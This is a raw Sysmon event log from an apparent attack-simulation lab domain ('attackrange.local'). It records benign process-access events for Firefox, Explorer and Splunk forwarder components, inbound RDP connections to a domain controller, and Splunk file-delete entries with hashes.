Firefox\xul.dll+2b4572|C:\Program Files\Mozilla Firefox\xul.dll+1ab7d5f|C:\Program Files\Mozilla Firefox\xul.dll+f0caf6 10341000x80000000000000001051943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.970{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.970{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.954{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+ec7f3e|C:\Program Files\Mozilla Firefox\xul.dll+2870d2|C:\Program Files\Mozilla Firefox\xul.dll+2863bf|C:\Program Files\Mozilla Firefox\xul.dll+2861aa|C:\Program Files\Mozilla Firefox\xul.dll+ee10a5|C:\Program Files\Mozilla Firefox\xul.dll+18ab07a|C:\Program Files\Mozilla Firefox\xul.dll+1ac1848|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac3db2|C:\Program Files\Mozilla Firefox\xul.dll+176a76e|C:\Program Files\Mozilla Firefox\xul.dll+1769e45|C:\Program Files\Mozilla Firefox\xul.dll+31a310c|C:\Program Files\Mozilla Firefox\xul.dll+31a3470|C:\Program Files\Mozilla Firefox\xul.dll+2ecb3d5|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+19eeeaf 10341000x80000000000000001051940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.954{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+ec7f17|C:\Program Files\Mozilla Firefox\xul.dll+2870d2|C:\Program Files\Mozilla Firefox\xul.dll+2863bf|C:\Program Files\Mozilla Firefox\xul.dll+2861aa|C:\Program Files\Mozilla Firefox\xul.dll+ee10a5|C:\Program Files\Mozilla Firefox\xul.dll+18ab07a|C:\Program Files\Mozilla Firefox\xul.dll+1ac1848|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac3db2|C:\Program Files\Mozilla Firefox\xul.dll+176a76e|C:\Program Files\Mozilla Firefox\xul.dll+1769e45|C:\Program Files\Mozilla Firefox\xul.dll+31a310c|C:\Program Files\Mozilla Firefox\xul.dll+31a3470|C:\Program Files\Mozilla Firefox\xul.dll+2ecb3d5|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+19eeeaf 10341000x80000000000000001051939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.954{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+ec7eec|C:\Program Files\Mozilla Firefox\xul.dll+2870d2|C:\Program Files\Mozilla Firefox\xul.dll+2863bf|C:\Program Files\Mozilla Firefox\xul.dll+2861aa|C:\Program Files\Mozilla Firefox\xul.dll+ee10a5|C:\Program Files\Mozilla Firefox\xul.dll+18ab07a|C:\Program Files\Mozilla Firefox\xul.dll+1ac1848|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac3db2|C:\Program Files\Mozilla Firefox\xul.dll+176a76e|C:\Program Files\Mozilla Firefox\xul.dll+1769e45|C:\Program Files\Mozilla Firefox\xul.dll+31a310c|C:\Program Files\Mozilla Firefox\xul.dll+31a3470|C:\Program Files\Mozilla Firefox\xul.dll+2ecb3d5|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+19eeeaf 10341000x80000000000000001051938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.939{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+ec7f3e|C:\Program Files\Mozilla Firefox\xul.dll+2870d2|C:\Program Files\Mozilla Firefox\xul.dll+2863bf|C:\Program Files\Mozilla Firefox\xul.dll+2861aa|C:\Program Files\Mozilla Firefox\xul.dll+ee10a5|C:\Program Files\Mozilla Firefox\xul.dll+18ab07a|C:\Program Files\Mozilla Firefox\xul.dll+1ac1848|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac3db2|C:\Program Files\Mozilla Firefox\xul.dll+176a76e|C:\Program Files\Mozilla Firefox\xul.dll+1769e45|C:\Program Files\Mozilla Firefox\xul.dll+31a310c|C:\Program Files\Mozilla Firefox\xul.dll+31a3470|C:\Program Files\Mozilla Firefox\xul.dll+2ecb3d5|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+19eeeaf 10341000x80000000000000001051937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.939{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+ec7f17|C:\Program Files\Mozilla Firefox\xul.dll+2870d2|C:\Program Files\Mozilla Firefox\xul.dll+2863bf|C:\Program Files\Mozilla Firefox\xul.dll+2861aa|C:\Program Files\Mozilla Firefox\xul.dll+ee10a5|C:\Program Files\Mozilla Firefox\xul.dll+18ab07a|C:\Program Files\Mozilla Firefox\xul.dll+1ac1848|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac3db2|C:\Program Files\Mozilla Firefox\xul.dll+176a76e|C:\Program Files\Mozilla Firefox\xul.dll+1769e45|C:\Program Files\Mozilla Firefox\xul.dll+31a310c|C:\Program Files\Mozilla Firefox\xul.dll+31a3470|C:\Program Files\Mozilla Firefox\xul.dll+2ecb3d5|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+19eeeaf 10341000x80000000000000001051936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.939{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+ec7eec|C:\Program Files\Mozilla Firefox\xul.dll+2870d2|C:\Program Files\Mozilla Firefox\xul.dll+2863bf|C:\Program Files\Mozilla Firefox\xul.dll+2861aa|C:\Program Files\Mozilla Firefox\xul.dll+ee10a5|C:\Program Files\Mozilla Firefox\xul.dll+18ab07a|C:\Program Files\Mozilla Firefox\xul.dll+1ac1848|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac1a8f|C:\Program Files\Mozilla Firefox\xul.dll+1ac3db2|C:\Program Files\Mozilla Firefox\xul.dll+176a76e|C:\Program Files\Mozilla Firefox\xul.dll+1769e45|C:\Program Files\Mozilla Firefox\xul.dll+31a310c|C:\Program Files\Mozilla Firefox\xul.dll+31a3470|C:\Program Files\Mozilla Firefox\xul.dll+2ecb3d5|C:\Program Files\Mozilla Firefox\xul.dll+16f88d0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+19eeeaf 10341000x80000000000000001051935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.816{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.816{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.785{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.785{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.785{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001051930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:50.780{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse103.116.142.22-142-116-103.speedking.in58525-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:50.516{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse103.116.142.22-142-116-103.speedking.in58425-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.154{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08EBABA68EDECF35169C3B3E99E120DC,SHA256=6FFFFE51AA4989861E6C68A848A10F9D77D1670C4794EE70994D1B116664B682,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980279Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:50.739{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59468-false10.0.1.12-8000- 23542300x8000000000000000980278Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:53.491{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BBCBCDC9CCC29452F1302BB9FF44989,SHA256=A4FD4C7B16C93868F37C047A3A4794152796CEBA617F7E9BA93015BB34E57A2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:53.155{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42E60B31C2270385150D86B5EC289CA4,SHA256=076F0F9B2B1A76A8785F41EFC65E0F1498FE728BE7F2612FFA4F07F9C6ABFC83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:53.117{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+bee203|C:\Program Files\Mozilla Firefox\xul.dll+bed8a1|C:\Program Files\Mozilla Firefox\xul.dll+be54a3|C:\Program Files\Mozilla Firefox\xul.dll+beec50|C:\Program Files\Mozilla Firefox\xul.dll+fdc990|C:\Program Files\Mozilla Firefox\xul.dll+fcd08b|C:\Program Files\Mozilla Firefox\xul.dll+1a1b54f|C:\Program Files\Mozilla Firefox\xul.dll+fd4837|C:\Program Files\Mozilla Firefox\xul.dll+1a1b54f|C:\Program Files\Mozilla Firefox\xul.dll+b78344|C:\Program Files\Mozilla Firefox\xul.dll+fca4c4|C:\Program Files\Mozilla Firefox\xul.dll+f36457|C:\Program Files\Mozilla Firefox\xul.dll+2cbfda|C:\Program Files\Mozilla Firefox\xul.dll+ea7e38|C:\Program Files\Mozilla Firefox\xul.dll+ea7972 23542300x80000000000000001051945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:53.070{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4D902EA15FD12E4352E3C568D81A0E4,SHA256=1D91C6B41632323C4132D9F69F57E7168D5687DE9C8937A6BAF280A030D3987C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980280Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:54.726{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D59F48DC7731D7425139C17CFCD26DBD,SHA256=2DD5A50D40650A1CF3D96798E46E400B2B21A0950B33BD26C0CE33C6B08FAE03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.886{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+a0d439|C:\Program Files\Mozilla Firefox\xul.dll+a0d35a|C:\Program Files\Mozilla Firefox\xul.dll+a0cf49|C:\Program Files\Mozilla Firefox\xul.dll+a090df|C:\Program Files\Mozilla Firefox\xul.dll+a093ec|C:\Program Files\Mozilla Firefox\xul.dll+b55c5a|C:\Program Files\Mozilla Firefox\xul.dll+2d9649|C:\Program Files\Mozilla Firefox\xul.dll+2d9554|C:\Program Files\Mozilla Firefox\xul.dll+2d933d|C:\Program Files\Mozilla Firefox\xul.dll+2d91d4|C:\Program Files\Mozilla Firefox\xul.dll+ba1993|C:\Program Files\Mozilla Firefox\xul.dll+ba2691|C:\Program Files\Mozilla Firefox\xul.dll+ba168d|C:\Program Files\Mozilla Firefox\xul.dll+ba15e2|C:\Program Files\Mozilla Firefox\xul.dll+b723b2|C:\Program Files\Mozilla Firefox\xul.dll+1a1b580|C:\Program Files\Mozilla Firefox\xul.dll+b78344|C:\Program Files\Mozilla Firefox\xul.dll+fca4c4|C:\Program Files\Mozilla Firefox\xul.dll+f36457|C:\Program Files\Mozilla Firefox\xul.dll+2cbfda 10341000x80000000000000001051967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.870{5EBD8912-8C7E-6151-697A-00000000FC01}70006596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.701{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C7E-6151-697A-00000000FC01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.701{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.701{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.701{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 